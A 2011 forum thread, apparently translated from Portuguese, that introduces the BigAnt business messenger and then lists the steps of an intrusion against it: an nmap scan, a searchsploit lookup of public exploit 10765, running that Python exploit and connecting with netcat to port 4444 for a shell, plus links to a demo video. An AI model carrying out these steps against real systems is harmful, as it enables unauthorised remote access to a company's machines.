View Full Version : Exploring failure BigAnt

05-23-2011, 10:55 PM
The BigAnt is a software aimed at business use, since it's basically an instant messenger in which the network administrator creates a server, creates all the accounts you can access it by setting its access permissions and passwords, and integrates communication of its employees, no matter the size of your company. Moreover, all the messages are encrypted, ie there is no danger of someone stealing confidential information through a conversation between managers, for example.

By downloading BigAnt there will be two files, one is the messenger itself and the other is the console, or the server for which the administrator will control the swing of things. Install both. The first thing to do is turn the console and create a server, users and groups. When running the console click on "demo" to watch a video demonstrating the basic operation of it.


Now that we know and what program, an intrusion vamas simple ...


Tools used:
Nmap - http://nmap.org/download.html
Netcat - http://netcat.sourceforge.net/download.php
Exploit - http://www.exploit-db.com/exploits/10765/


nmap -p 1-9999
cd /pentest/exploits/exploit-db
./searchsploit bigant
cp platforms/windows/remote/10765.py /root/
cd /root/
python 10765.py
nc 4444


About Video:
Tamanho: 34 Mb
Formato: AVI
Duração: 3:14
Musica: The Marcels - Blue Moon
Baixar: http://www.4shared.com/file/R75fA9Vn/bigant.html
Online: http://vimeo.com/24062981

Ref: http://remote-execution.blogspot.com/2011/05/explorando-falha-no-bigant.html

05-24-2011, 11:35 AM
Pretty cool, thanks for the video.